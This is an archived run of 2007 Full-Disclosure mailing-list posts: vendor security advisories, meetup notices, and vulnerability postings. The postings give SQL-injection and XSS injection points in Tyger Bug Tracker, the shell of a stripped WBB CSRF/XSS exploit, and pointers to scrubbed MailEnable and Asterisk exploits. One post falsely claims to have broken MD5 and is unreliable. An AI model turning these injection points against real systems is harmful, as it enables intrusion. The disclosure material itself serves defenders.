2007 17:34:19 +0100 Subject: [Full-disclosure] [ GLSA 200703-05 ] Mozilla Suite: Multiple vulnerabilities Message-ID: <20070303163419.GB8439@falco.falcal.net> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200703-05 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Mozilla Suite: Multiple vulnerabilities Date: March 03, 2007 Bugs: #135257 ID: 200703-05 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Several vulnerabilities exist in the Mozilla Suite, which is no longer supported by the Mozilla project. Background ========== The Mozilla Suite is a popular all-in-one web browser that includes a mail and news reader. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 www-client/mozilla <= 1.7.13 Vulnerable! 2 www-client/mozilla-bin <= 1.7.13 Vulnerable! ------------------------------------------------------------------- NOTE: Certain packages are still vulnerable. Users should migrate to another package if one is available or wait for the existing packages to be marked stable by their architecture maintainers. ------------------------------------------------------------------- 2 affected packages on all of their supported architectures. ------------------------------------------------------------------- Description =========== Several vulnerabilities ranging from code execution with elevated privileges to information leaks affect the Mozilla Suite. Impact ====== A remote attacker could entice a user to browse to a specially crafted website or open a specially crafted mail that could trigger some of the vulnerabilities, potentially allowing execution of arbitrary code, denials of service, information leaks, or cross-site scripting attacks leading to the robbery of cookies of authentication credentials. Workaround ========== Most of the issues, but not all of them, can be prevented by disabling the HTML rendering in the mail client and JavaScript on every application. Resolution ========== The Mozilla Suite is no longer supported and has been masked after some necessary changes on all the other ebuilds which used to depend on it. Mozilla Suite users should unmerge www-client/mozilla or www-client/mozilla-bin, and switch to a supported product, like SeaMonkey, Thunderbird or Firefox. # emerge --unmerge "www-client/mozilla" # emerge --unmerge "www-client/mozilla-bin" References ========== [ 1 ] Official Advisory http://www.mozilla.org/projects/security/known-vulnerabilities.html#Mozilla Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200703-05.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 481 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070303/f5810cdb/attachment.bin From announce-noreply at rpath.com Sat Mar 3 14:13:03 2007 From: announce-noreply at rpath.com (rPath Update Announcements) Date: Sat, 03 Mar 2007 09:13:03 -0500 Subject: [Full-disclosure] rPSA-2007-0048-1 tcpdump Message-ID: <45e9826f.IDuL/PXXLBSOh6LT%announce-noreply@rpath.com> rPath Security Advisory: 2007-0048-1 Published: 2007-03-03 Products: rPath Linux 1 Rating: Minor Exposure Level Classification: Remote User Deterministic Denial of Service Updated Versions: tcpdump=/conary.rpath.com at rpl:devel//1/3.9.5-0.1-1 References: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1218 https://issues.rpath.com/browse/RPL-1100 Description: Previous versions of the tcpdump package are vulnerable to a remote denial of service when printing 802.11 ethernet frames, only if the link type was specified explicitly on the tcpdump command line. No unauthorized access is understood to be enabled by this vulnerability. From announce-noreply at rpath.com Sat Mar 3 14:15:51 2007 From: announce-noreply at rpath.com (rPath Update Announcements) Date: Sat, 03 Mar 2007 09:15:51 -0500 Subject: [Full-disclosure] rPSA-2007-0040-3 firefox thunderbird Message-ID: <45e98317.YlMP32diPSAISo2N%announce-noreply@rpath.com> rPath Security Advisory: 2007-0040-3 Published: 2007-02-26 Updated: 2007-02-26 Correctly formatted CVE URLs 2007-03-03 Added newly-release thunderbird packages to advisory Products: rPath Linux 1 Rating: Severe Exposure Level Classification: Indirect User Deterministic Unauthorized Access Updated Versions: firefox=/conary.rpath.com at rpl:devel//1/1.5.0.10-0.1-1 thunderbird=/conary.rpath.com at rpl:devel//1/1.5.0.10-0.1-1 References: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6077 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0008 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0009 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0775 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0776 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0777 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0778 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0779 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0780 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0800 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0981 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0995 https://issues.rpath.com/browse/RPL-1081 https://issues.rpath.com/browse/RPL-1103 Description: Previous versions of the firefox package are vulnerable to several types of attacks, some of which are understood to allow compromised or malicious sites to run arbitrary code as the user running the firefox browser. 2 March 2007 Update: The vulnerabilities previously resolved in the firefox have now been resolved in the thunderbird package as well. From shyaam at gmail.com Fri Mar 2 12:41:11 2007 From: shyaam at gmail.com (Shyaam) Date: Fri, 2 Mar 2007 07:41:11 -0500 Subject: [Full-disclosure] March NorthernVirginia 2600/DefCon 571 Meeting Information Message-ID: Hi All, There will be NoVA 2600 meeting on March 2nd, which is today and DC571 meeting Next friday, which is Mar 9th. If anyone from NoVA has any questions about meeting locations, please do contact me at this email. Kind Regards Shyaam -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070302/9e459efd/attachment.html From marcio.barbado at gmail.com Fri Mar 2 14:57:55 2007 From: marcio.barbado at gmail.com (M.B.Jr.) Date: Fri, 2 Mar 2007 11:57:55 -0300 Subject: [Full-disclosure] March 2nd Chicago 2600/DefCon 312 Meeting Information In-Reply-To: <8a6b8e350703010117s318990ev17479411e39d89a8@mail.gmail.com> References: <28326b7c0702281412m607ff66av76c67652cb3763ef@mail.gmail.com> <8a6b8e350703010117s318990ev17479411e39d89a8@mail.gmail.com> Message-ID: <2df3b0cb0703020657o158cbc47u53b2293d0184edcf@mail.gmail.com> haha modern days underground survivors! viva mr. Corley-Goldstein! On 3/1/07, James Matthews wrote: > > Great i cannot wait! > > On 2/28/07, Steven McGrath wrote: > > > > The March Chicago 2600 Meeting is near! The meeting will be Friday, > > March 2nd at the Neighborhood Boys and Girls Club and will feature much > > of the same usual fun that all of you have grown to expect! > > > > [Presentation Information] > > - 9:00pm - Hacklab: Current Progress (Maniac, et al.) > > - 10:00pm - How to build a public server (Maniac) > > - After hours - Wii, Music, Socializing, etc. > > > > [General Information] > > - Meeting Time: 7.00pm - Approx. 3-5am > > - Meeting Date: Friday, March 2nd > > - Place : 2501 W Irving Park Road, Chicago > > - More Info : http://chicago2600.net > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > > > -- > http://www.goldwatches.com/watches.asp?Brand=39 > http://www.wazoozle.com > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -- Marcio Barbado, Jr. ============== ============== -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070302/013daf8b/attachment.html From mc.iglo at googlemail.com Fri Mar 2 19:41:21 2007 From: mc.iglo at googlemail.com (MC Iglo) Date: Fri, 2 Mar 2007 20:41:21 +0100 Subject: [Full-disclosure] Woltlab Burning Board (wbb) 2.3.6 CSRF/XSS - 0day In-Reply-To: <20070302182422.45737.qmail@web27811.mail.ukl.yahoo.com> References: <20070302182422.45737.qmail@web27811.mail.ukl.yahoo.com> Message-ID: <99e73caa0703021141w17874804p58a2e65e19a55907@mail.gmail.com> On my WBB 2.3.3 (and i think, this is the default setting) you cannot access register.php when logged in (even as admin). So you need to be logged off to open the evil site. And when you are logged off, the cookie is simply useless. Also, on my Forum, only r_dateformat and r_timeformat are affected. regards 2007/3/2, SaMuschie : > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > +--------------------------------------- - -- - > | SaMuschie Research Labs proudly presents . . . > +------------------------------------------- -- - - > | Application: Woltlab Burning Board (wbb) > | Version: 2.3.6 (others not testet) > | Vuln./Exploit Type: CSRF/XSS > | Status: 0day > +----------------------------------------- -- - - > | Discovered by: Samenspender > | Released: 20070302 > | SaMuschie Release Number: 5 > +------------------------------- - -- - > > CSRF/XSS Exploit: > > cat < wetpussy.html >
> > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > >
> > EOF > > +----------------------------- -- - > | Lameness Disclaimer > +------------------------------------- - -- - - > | SaMuschie Research Labs was founded to publish > | vulnerabilities within well known software products, > | which are easy to discover and exploit. > | > | SaMuschie researchers just spend a minimum of time > | and knowledge for each vulnerability. Hence readers of > | this advisory are requested not to ask any questions > | to the researchers.... they don't know the answer ;) > +---------------------------------- - -- - - > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.4.6 (GNU/Linux) > > iD8DBQFF6AyiMFgfGpQK8VERAsieAJwIMk+g0Y70cV6dR5YtsMfq4U+5fgCfWWzD > Qg6at+bMTnvHbw0SYyXk5ko= > =7wPg > -----END PGP SIGNATURE----- > > > > > > > ___________________________________________________________ > Der fr?he Vogel f?ngt den Wurm. Hier gelangen Sie zum neuen Yahoo! Mail: http://mail.yahoo.de > > From skodliv at gmail.com Sat Mar 3 15:04:27 2007 From: skodliv at gmail.com (poo) Date: Sat, 3 Mar 2007 16:04:27 +0100 Subject: [Full-disclosure] MailEnable v2.37 APPEND exploit In-Reply-To: <45E85F73.40401@digit-labs.org> References: <45E85F73.40401@digit-labs.org> Message-ID: keep disclosin! On 3/2/07, mu-b wrote: > > Attached is another exploit for the MailEnable Pro/Ent <= 2.37 (including > the > latest). The vulnerability is a bog-standard stack based overflow in the > call at offset 0x00417CD6 (MEIMAPS.exe, v2.37). > > > --------------------------------------------------------------------------- > (mu-b at digit-labs.org) > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > -- smile tomorrow will be worse -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070303/a0b8118b/attachment.html From corrado.liotta at alice.it Sat Mar 3 17:39:06 2007 From: corrado.liotta at alice.it (corrado.liotta at alice.it) Date: Sat, 3 Mar 2007 18:39:06 +0100 Subject: [Full-disclosure] Tyger Bug Tracking System Multiple Vulnerability Message-ID: -=[--------------------ADVISORY-------------------]=- Tyger Bug Tracking System Author: CorryL [corryl80 at gmail.com] -=[-----------------------------------------------]=- -=[+] Application: Tyger Bug Tracking System -=[+] Version: 1.1.3 -=[+] Vendor's URL: http://uk.homeunix.org/tyger/cms/ -=[+] Platform: Windows\Linux\Unix -=[+] Bug type: Cross-Site Script\Sql injection -=[+] Exploitation: Remote -=[-] -=[+] Author: CorryL ~ corryl80[at]gmail[dot]com ~ -=[+] Reference: www.xoned.net -=[+] Virtual Office: http://www.kasamba.com/CorryL -=[+] Irc Chan: irc.darksin.net #x0n3-h4ck ..::[ Descriprion ]::.. Tyger Bug tracking software has been designed and developed or individuals or groups of software developers to manage software development better. By using Tyger teams of developers are able to communicate far better with each fellow developers or end user's which ultimately improves the quality of your software project or product. ..::[ Proof Of Concept ]::.. [Sql injection] http://remote_server/ViewBugs.php?s=[sql]&o=ASC [Xss] http://remote_server/Login.php/>">[XSS] http://remote_server/Register.php/>">[XSS] -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070303/9269680a/attachment.html From psz at observed.de Sat Mar 3 19:06:46 2007 From: psz at observed.de (Paul Sebastian Ziegler) Date: Sat, 03 Mar 2007 20:06:46 +0100 Subject: [Full-disclosure] PostScript security research Message-ID: <45E9C746.50804@observed.de> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Hi, I'm currently coming across a lot of PostScript documents. And I realize that most people consider them as "pictures" and thus plainly open them. This is why I thought about testing it's security and possibly creating some PoC to raise awareness. During my research I found that PostScript has the possibility to open and manipulate files. Now that's a good start. :) Also this project here proves that it must somehow be possible to "bind" to a port: http://public.planetmirror.com/pub/pshttpd/ (Still researching this one...) However google hasn't been particularly helpful when it came to the following questions: 1) Has anybody researched this before (no need to crash open doors) 2) Is PostScript capable of using the system()-call or something similar? Does anybody know about this? Thanks in advance Paul -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFF6cdGaHrXRd80sY8RCsj6AKCT9KwwH/+GCw/td1ZCLN6E4MqF+wCgixu5 fnqrvlvr37O36zEeBfD3BJA= =/lno -----END PGP SIGNATURE----- From falco at gentoo.org Sat Mar 3 19:28:03 2007 From: falco at gentoo.org (Raphael Marichez) Date: Sat, 3 Mar 2007 20:28:03 +0100 Subject: [Full-disclosure] ERRATA: [ GLSA 200703-01 ] Snort: Remote execution of arbitrary code Message-ID: <20070303192803.GC23196@falco.falcal.net> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory [ERRATA UPDATE] GLSA 200703-01:02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: Snort: Remote execution of arbitrary code Date: February 23, 2007 Updated: March 02, 2007 Bugs: #167730 ID: 200703-01:02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Errata ====== The initial workaround provided by the GLSA does not avoid the mentioned vulnerability. The corrected section appears below. Workaround ========== Disable the DCE/RPC processor by commenting the 'preprocessor dcerpc' section in /etc/snort/snort.conf . Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200703-01.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 481 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070303/0ca3ae99/attachment.bin From metaur at telia.com Sat Mar 3 22:44:23 2007 From: metaur at telia.com (Ulf Harnhammar) Date: Sat, 3 Mar 2007 23:44:23 +0100 Subject: [Full-disclosure] PostScript security research Message-ID: <20070303224423.GA3016@localhost.localdomain> > Also this project here proves that it must somehow be possible to "bind" > to a port: http://public.planetmirror.com/pub/pshttpd/ > (Still researching this one...) I don't think it does. According to this link, ps-httpd gets started from (x)inetd: http://209.85.135.104/search?q=cache:1k8IXp9mFDcJ:www.xent.com/april00/0257.html+%22ps-httpd%22+%2Binetd&hl=sv&ct=clnk&cd=3&gl=se It's a nice hack, anyway! Regards, Ulf Harnhammar From falco at gentoo.org Sun Mar 4 00:11:27 2007 From: falco at gentoo.org (Raphael Marichez) Date: Sun, 4 Mar 2007 01:11:27 +0100 Subject: [Full-disclosure] [ GLSA 200703-06 ] AMD64 x86 emulation Qt library: Integer overflow Message-ID: <20070304001127.GD3492@falco.falcal.net> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200703-06 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: AMD64 x86 emulation Qt library: Integer overflow Date: March 04, 2007 Bugs: #153704 ID: 200703-06 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== The AMD64 x86 emulation Qt library makes use of an insecure version of the Qt library, potentially allowing for the remote execution of arbitrary code. Background ========== The AMD64 x86 emulation Qt library for AMD64 emulates the x86 (32-bit) Qt library on the AMD64 (64-bit) architecture. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 emul-linux-x86-qtlibs < 10.0 >= 10.0 Description =========== An integer overflow flaw has been found in the pixmap handling of Qt, making the AMD64 x86 emulation Qt library vulnerable as well. Impact ====== By enticing a user to open a specially crafted pixmap image in an application using the AMD64 x86 emulation Qt library, a remote attacker could cause an application crash or the remote execution of arbitrary code with the rights of the user running the application. Workaround ========== There is no known workaround at this time. Resolution ========== All AMD64 x86 emulation Qt library users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=app-emulation/emul-linux-x86-qtlibs-10.0" References ========== [ 1 ] GLSA 200611-02 http://www.gentoo.org/security/en/glsa/glsa-200611-02.xml [ 2 ] CVE-2006-4811 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4811 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200703-06.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 481 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070304/66dafcd1/attachment.bin From slythers at gmail.com Sun Mar 4 12:05:31 2007 From: slythers at gmail.com (Slythers Bro) Date: Sun, 4 Mar 2007 13:05:31 +0100 Subject: [Full-disclosure] md5 is breaked with my new lib qbyte v2 In-Reply-To: <8f6a58a30703040400s698595e3ibc0e641b4c229679@mail.gmail.com> References: <8f6a58a30703040400s698595e3ibc0e641b4c229679@mail.gmail.com> Message-ID: <8f6a58a30703040405i6e3fe928hbd2027da3e049b12@mail.gmail.com> sorry the good url is * http://www.Php-exploit.info/index.php?id=3407&com=#onlythecrimepaid* On 3/4/07, Slythers Bro wrote: > > i breaked md5 > i used an evolued quantic atomic librairie for recompuation > where i compress the quantic flow :> and reduce the quantic recomputation > time > > code soure is here *http://www.php-exploit.info/index.php?id=md5-break-research&com=#onlythecrimepaid > * -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070304/63613a13/attachment.html From slythers at gmail.com Sun Mar 4 12:00:41 2007 From: slythers at gmail.com (Slythers Bro) Date: Sun, 4 Mar 2007 13:00:41 +0100 Subject: [Full-disclosure] md5 is breaked with my new lib qbyte v2 Message-ID: <8f6a58a30703040400s698595e3ibc0e641b4c229679@mail.gmail.com> i breaked md5 i used an evolued quantic atomic librairie for recompuation where i compress the quantic flow :> and reduce the quantic recomputation time code soure is here * http://www.php-exploit.info/index.php?id=md5-break-research&com=#onlythecrimepaid * -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070304/1e636bff/attachment.html From lolek1337 at googlemail.com Sun Mar 4 13:45:46 2007 From: lolek1337 at googlemail.com (Lolek of TK53) Date: Sun, 4 Mar 2007 14:45:46 +0100 Subject: [Full-disclosure] Knorr.de SQL Injection and XSS Vulnerabilities In-Reply-To: <20070302102325.2admma4uco4kg488@www.gjl-network.net> References: <20070302102325.2admma4uco4kg488@www.gjl-network.net> Message-ID: Hi, On 3/2/07, sbauer at gjl-network.net wrote: > Author: Sebastian Bauer > Web: http://blog.gjl-network.net > Date: 01/12/07 > > Vuln. website: http://www.knorr.de > Vulnerability: SQL Injection (mainly login authentication bypass + any > other SQL inj. > possibility), XSS > Significance: Very Critical OMFG who cares..... From ge at linuxbox.org Sun Mar 4 11:56:09 2007 From: ge at linuxbox.org (Gadi Evron) Date: Sun, 4 Mar 2007 05:56:09 -0600 (CST) Subject: [Full-disclosure] month of PHP bugs, secondary message? Message-ID: ----- 3. Are PHP applications also a target of this initiative? No they are not. If you want a month of PHP application bugs you can subscribe to the bugtraq or full-disclosure mailinglists. ----- http://www.php-security.org/ Gadi. From anonymousperzon at gmail.com Sun Mar 4 07:24:09 2007 From: anonymousperzon at gmail.com (Anonymous Person) Date: Sun, 4 Mar 2007 01:24:09 -0600 Subject: [Full-disclosure] asterisk remote pre-auth denial of service Message-ID: <98190afa0703032324w37dfad36y28d3c4350f84c09f@mail.gmail.com> A very serious remote denial of service was recently patched in asterisk some limited information on the problem can be found here http://asterisk.org/taxonomy/term/32 the bug exists in the asterisk SIP channel driver, anyone using asterisk running SIP is advised to patch their systems as soon as possible. i am posting this code to highlight severity of the bug which was fixed in the asterisk release yesterday without much of a description -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070304/8f02428c/attachment.html -------------- next part -------------- A non-text attachment was scrubbed... Name: asterisk-sip-kill.c Type: text/x-csrc Size: 2816 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070304/8f02428c/attachment.bin From meissner at suse.de Sun Mar 4 16:41:45 2007 From: meissner at suse.de (Marcus Meissner) Date: Sun, 4 Mar 2007 17:41:45 +0100 Subject: [Full-disclosure] month of PHP bugs, secondary message? In-Reply-To: References: Message-ID: <20070304164145.GA8921@suse.de> On Sun, Mar 04, 2007 at 05:56:09AM -0600, Gadi Evron wrote: > ----- > 3. Are PHP applications also a target of this initiative? > > No they are not. If you want a month of PHP application bugs you can > subscribe to the bugtraq or full-disclosure mailinglists. > > ----- > > http://www.php-security.org/ Its the "Month of PHP application bugs" since over 2 years now. Sad enough. Ciao, Marcus From jammer128 at gmail.com Sun Mar 4 17:18:33 2007 From: jammer128 at gmail.com (Jason Miller) Date: Sun, 4 Mar 2007 11:18:33 -0600 Subject: [Full-disclosure] md5 is breaked with my new lib qbyte v2 In-Reply-To: <8f6a58a30703040405i6e3fe928hbd2027da3e049b12@mail.gmail.com> References: <8f6a58a30703040400s698595e3ibc0e641b4c229679@mail.gmail.com> <8f6a58a30703040405i6e3fe928hbd2027da3e049b12@mail.gmail.com> Message-ID: <829b2de40703040918id213052td87247793a91a10c@mail.gmail.com> what a dumbass, don't bother clicking. it's just one of those lame click games where you get people to click your link for points. On 3/4/07, Slythers Bro wrote: > > sorry the good url is * > http://www.Php-exploit.info/index.php?id=3407&com=#onlythecrimepaid* > > On 3/4/07, Slythers Bro wrote: > > > > i breaked md5 > > i used an evolued quantic atomic librairie for recompuation > > where i compress the quantic flow :> and reduce the quantic > > recomputation time > > > > code soure is here *http://www.php-exploit.info/index.php?id=md5-break-research&com=#onlythecrimepaid > > * > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070304/c25ceac0/attachment.html From jmm at debian.org Sun Mar 4 17:57:37 2007 From: jmm at debian.org (Moritz Muehlenhoff) Date: Sun, 4 Mar 2007 18:57:37 +0100 Subject: [Full-disclosure] [SECURITY] [DSA 1262-1] New gnomemeeting packages fix arbitrary code execution Message-ID: <20070304175736.GA3810@galadriel.inutil.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - -------------------------------------------------------------------------- Debian Security Advisory DSA 1262-1 security at debian.org http://www.debian.org/security/ Moritz Muehlenhoff March 4th, 2007 http://www.debian.org/security/faq - -------------------------------------------------------------------------- Package : gnomemeeting Vulnerability : format string Problem-Type : remote Debian-specific: no CVE ID : CVE-2007-1007 "Mu Security" discovered that a format string vulnerability in the VoIP solution GnomeMeeting allows the execution of arbitrary code. For the stable distribution (sarge) this problem has been fixed in version 1.2.1-1sarge1. For the upcoming stable distribution (etch) this problem has been fixed in version 2.0.3-2.1 of the ekiga package. For the unstable distribution (sid) this problem has been fixed in version 2.0.3-2.1 of the ekiga package. We recommend that you upgrade your gnomemeeting package. Upgrade Instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - -------------------------------- Source archives: http://security.debian.org/pool/updates/main/g/gnomemeeting/gnomemeeting_1.2.1-1sarge1.dsc Size/MD5 checksum: 1746 e82643f764d6b43c521cca39a387e8f8 http://security.debian.org/pool/updates/main/g/gnomemeeting/gnomemeeting_1.2.1-1sarge1.diff.gz Size/MD5 checksum: 22888 194f7471c22e1c81d5ab4325603e0cd1 http://security.debian.org/pool/updates/main/g/gnomemeeting/gnomemeeting_1.2.1.orig.tar.gz Size/MD5 checksum: 5525398 93829f3eee783f32eaefebc9e717fb89 Alpha architecture: http://security.debian.org/pool/updates/main/g/gnomemeeting/gnomemeeting_1.2.1-1sarge1_alpha.deb Size/MD5 checksum: 3146922 f500df544b335593a2bb9431cbd21592 AMD64 architecture: http://security.debian.org/pool/updates/main/g/gnomemeeting/gnomemeeting_1.2.1-1sarge1_amd64.deb Size/MD5 checksum: 3119044 672fbec91d13256a46a8803486a03346 ARM architecture: http://security.debian.org/pool/updates/main/g/gnomemeeting/gnomemeeting_1.2.1-1sarge1_arm.deb Size/MD5 checksum: 3089174 45beb5e78751eddbb13bd812b464cfb2 HP Precision architecture: http://security.debian.org/pool/updates/main/g/gnomemeeting/gnomemeeting_1.2.1-1sarge1_hppa.deb Size/MD5 checksum: 3119086 7f92e053556ba684c120aa83c7a7c114 Intel IA-32 architecture: http://security.debian.org/pool/updates/main/g/gnomemeeting/gnomemeeting_1.2.1-1sarge1_i386.deb Size/MD5 checksum: 3105396 4883efb8f1da3aa1641e249f50030f10 Intel IA-64 architecture: http://security.debian.org/pool/updates/main/g/gnomemeeting/gnomemeeting_1.2.1-1sarge1_ia64.deb Size/MD5 checksum: 3192488 393b4321afb3e4077a3958d686fa02a1 Motorola 680x0 architecture: http://security.debian.org/pool/updates/main/g/gnomemeeting/gnomemeeting_1.2.1-1sarge1_m68k.deb Size/MD5 checksum: 3080404 d9663a63d7077b2a0cd81722a44e53d0 Big endian MIPS architecture: http://security.debian.org/pool/updates/main/g/gnomemeeting/gnomemeeting_1.2.1-1sarge1_mips.deb Size/MD5 checksum: 3131084 2c7367aabe62f5f9169fc81ea217c448 Little endian MIPS architecture: http://security.debian.org/pool/updates/main/g/gnomemeeting/gnomemeeting_1.2.1-1sarge1_mipsel.deb Size/MD5 checksum: 3123832 ca06f5a2993f0b1ded5834ed1077e969 PowerPC architecture: http://security.debian.org/pool/updates/main/g/gnomemeeting/gnomemeeting_1.2.1-1sarge1_powerpc.deb Size/MD5 checksum: 3103054 22b5b85dd549856800375f06cfc0dfa6 IBM S/390 architecture: http://security.debian.org/pool/updates/main/g/gnomemeeting/gnomemeeting_1.2.1-1sarge1_s390.deb Size/MD5 checksum: 3110952 bcf48d4d889661c1659c1afcbeaa2d24 Sun Sparc architecture: http://security.debian.org/pool/updates/main/g/gnomemeeting/gnomemeeting_1.2.1-1sarge1_sparc.deb Size/MD5 checksum: 3093420 1d6df4cf0981cf802be3d9b06075ec41 These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFF6wgyXm3vHE4uyloRAoFKAJ4n04w8pXcugWLh8++Nd6nFiS69AACfeI16 gUugKZhfpqNlAPQKcUTZP3I= =C8ho -----END PGP SIGNATURE----- From 3APA3A at security.nnov.ru Sun Mar 4 18:45:14 2007 From: 3APA3A at security.nnov.ru (3APA3A) Date: Sun, 4 Mar 2007 21:45:14 +0300 Subject: [Full-disclosure] MOPB-08-2007 - dejavu of dejavu Message-ID: <1323880093.20070304214514@security.nnov.ru> Hello mopb, phpinfo() crossite scripting http://www.php-security.org/MOPB/MOPB-08-2007.html was initially(?) reported in 2003 by Silent Needle http://securityvulns.com/docs4647.html -- /3APA3A http://securityvulns.com/ From Valdis.Kletnieks at vt.edu Sun Mar 4 19:01:51 2007 From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu) Date: Sun, 04 Mar 2007 14:01:51 -0500 Subject: [Full-disclosure] PostScript security research In-Reply-To: Your message of "Sat, 03 Mar 2007 20:06:46 +0100." <45E9C746.50804@observed.de> References: <45E9C746.50804@observed.de> Message-ID: 